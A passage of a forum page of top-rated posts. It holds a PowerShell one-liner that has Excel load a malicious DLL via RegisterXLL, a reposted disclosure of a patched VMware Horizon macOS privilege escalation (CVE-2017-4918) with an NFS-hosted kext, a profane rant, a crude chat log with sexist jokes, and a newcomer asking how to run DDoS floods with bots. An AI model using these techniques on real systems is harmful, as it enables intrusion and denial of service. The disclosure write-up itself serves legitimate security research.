          $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")
      Source: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
    1 point
  13. CVE-2017-4918: Code Injection in VMware Horizon’s macOS Client
      Jul 10, 2017

      In this blog post I want to discuss a code injection vulnerability in VMware Horizon‘s macOS Client Version 4.4.0 (5164329) that can be abused to gain local root privileges. The good news is that it has already been fixed in the latest available version. I found it after learning about the “Open VMware View Client Services” SUID binary on my Mac. I think it is used internally by Horizon’s remote USB services and is only exploitable after they have been started once by entering administrative credentials.
      To investigate the binary further, I used the newly released FireEye application Monitor.app. It basically is Process Monitor (procmon) for macOS. Based on the activities as captured by Monitor.app it was clear that “Open VMware View Client Services” was basically a wrapper around “services.sh”. This makes sense as the SUID bit is ignored for script files. After taking a closer look at this script, I identified the highlighted line in the following screenshot as a starting point for a possible code injection vulnerability.
      Although I had no idea about the inner workings of “./vmware-usbarbitrator”, this binary was immediately my focus for further investigations. The reason for this is that I – as a non-admin user – am able to set the content of the environment variable VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS that is used in an SUID executed script. After taking a closer look at the possible command line options I was pretty sure I could abuse this setup to load a custom kernel extension by abusing the --kext flag. However, there are two further problems:
      1. Kernel Extensions are only loaded if they are owned by root : wheel
      2. Additionally, KEXTs have to be signed by Apple.
      In the course of this LPE I will ignore issue #2. Hence, I disabled SIP. So let’s focus on issue #1.
      To successfully load a kernel extension the binary has to be owned by root : wheel. However, for a normal user it is impossible to set these file system permissions on any local file. Luckily, I had already invested plenty of time to learn about the ins and outs of file systems at Tools On Air. So I knew the only thing I had to do was to abuse NFS. This is possible because NFS allows the server to specify the file system permissions, even if mounted by a user. Any other local or remote file system I know of ignores files owned by root in some way. So my next step was to simply export a remote folder (on the Kali Linux I always carry around with me) using NFS… … and mount it using Finder’s “Connect to Server”. After creating a simple KEXT… and updating the Info.plist file to meet the requirements (simply add a dictionary “IOKitPersonalities”) we are ready! After copying this KEXT to the NFS server and adapting its permissions to meet the “root:wheel” requirement, we are finally able to start the real exploitation. To do so simply set the “VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS” environment variable to our previously created KEXT and run “Open VMware View Client Services”. This is enough to load it! Hence, we gained code execution from a normal user’s account within the kernel context!

      Suggested Solution
      Filter or clear the environment variables VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS and VMWARE_VIEW_USBD_LOG_OPTIONS.

      Disclosure Timeline
      - 21-04-2017: The issue has been documented and reported
      - 24-04-2017: VMware started investigating
      - 06-06-2017: Fix ready
      - 08-06-2017: Updated Horizon version 4.5 alongside security advisory VMSA-2017-0011 released
      Source: https://bogner.sh/2017/07/cve-2017-4918-code-injection-in-vmware-horizons-macos-client/
    1 point
  14. Let me tell you something, maybe you'll stop with these posts. I appreciated in many of your past posts (about programming in general) that you were trying. Fuck, something wouldn't work, you'd post it here. It looked like you'd get somewhere and that you were on an okay path. Now if I look at your post history, you've got (in random order):
- fitness
- PPI (or whatever the fuck that click crap is called)
- dentistry
- off-shores / dropshipping
- forex
- accounting
- a CS:GO item site
- etc...
All of the above within a super short interval. Now, you don't have to listen to me; most people here know I talk a lot of shit, know that I'm retarded, handicapped, stupid and that I don't give a fuck about absolutely anything on this planet, especially gypsies, the church and politics. Where am I going with this? Guys, wake the fuck up! Stop with the forex / ppi / fbi / nsa / plm / fmm etc. Or stick with one of them and push until you see the money come in or you fail. Especially those of you who have something upstairs and can profit from it. I remember I was like that too:
- wow, what an app idea I have. I'm becoming a millionaire.
- fuck me, what an idea I just had, I'm going to crush Google Apps
- fuck programming, I'm taking up poker.
- I'll go work on cranes
And I kept that up for about a year only to realise I was a two-bit loser (well, I still am) who hadn't done anything, was wasting time dicking around and that's about it. I stopped, focused on programming & stuff, and now I don't give a fuck, I do what I like and joke around with @fallen_angel @Gecko @badluck @aelius etc... on chat while I'm at the office, because everything seems light and easy and nice. Where are the trillionaires? They're everywhere, man, they just don't open 9 topics a month, each on a totally different subject. Get your head straight and come the fuck back down to earth. //PS: it's cool to ask questions, to want to know stuff and so on...
but you can do that on chat, in your free time, when you take a break from what really matters. You can't have everything in life //PS2: For those bored by my post, here you go:
    1 point
  15. mov_0ah_01: lol
mov_0ah_01: look at him sleeping on me
mov_0ah_01: https://www.screencast.com/t/N2keqXvE3x
aelius: the right side of the TV sags 1.5 cm lower
aelius: put a spirit level on it :))))))
mov_0ah_01: it was levelled
aelius: =)))))))) it's not
mov_0ah_01: it is, man
aelius: go check and see
mov_0ah_01: it looks like it to me too from the photo
mov_0ah_01: but when I put it up it was level.. 4 years ago
aelius: it sagged
fallen_angel: and there have been about 3 earthquakes since then
mov_0ah_01: it's not flush against the wall, maybe that's why it looks like that
mov_0ah_01: you're making me go put the level on it right now
mov_0ah_01: my wife will curse me out, she's watching TV
mov_0ah_01: you asshole
aelius: exactly 1.5 CM
mov_0ah_01: I won't even be able to sleep tonight
mov_0ah_01: fuck me
aelius: straighten it man, it's crooked, I'd knock the fucking wall down on top of it
mov_0ah_01: =))))))))))))
aelius: I can't stand it anymore
aelius: I don't know how you can live in a house with a crooked TV
aelius: you'll end up with your neck like that too, tilted 10 degrees off horizontal
mov_0ah_01: so you keep your fucking head perfectly straight?
aelius: yes
aelius: level
mov_0ah_01: you're crazy
mov_0ah_01: adahgdqa
mov_0ah_01: sdasjhdasjfdhgsahahaha
aelius: it's crooked, fuck me
aelius: if a table with a glass of water shows up in a film
aelius: does the water look tilted in it?
aelius: my skin crawls when I see that crooked TV
aelius: get the woman to hold the TV
aelius: and you pull on the wall a bit
aelius: I'm serious, the TV is crooked
aelius: look closely at the woman, is she holding her head tilted?
mov_0ah_01: yeah, maybe it is crooked, could be... I don't care anymore
mov_0ah_01: WELL SHE'S A WOMAN, YOU MORON
mov_0ah_01: EVEN WHEN SHE STANDS STRAIGHT SHE'S CROOKED
aelius: wait, hold on
aelius: the dog's crooked too, bro
Meanwhile I'm talking to whois in private and tell him to put a spirit level under the TV in the photo. I think for another 10 seconds and tell him to add another small level on that dog too. Final result: :))))))))))))))
    1 point
  16. Hi, my name is Radu and I'm a beginner in "flooding". Some time ago I moved from C++ to Perl to write a flood script. All well and good; after a few weeks of learning Perl hard I managed to make something using the send() function. The script works perfectly, but I heard from some guys that there is some way to flood using bots, though I have no idea how they are used, etc. Can someone who knows bring me up to speed? Any help is welcome as long as it's related to the DDoS field. Thanks in advance!!!
    -6 points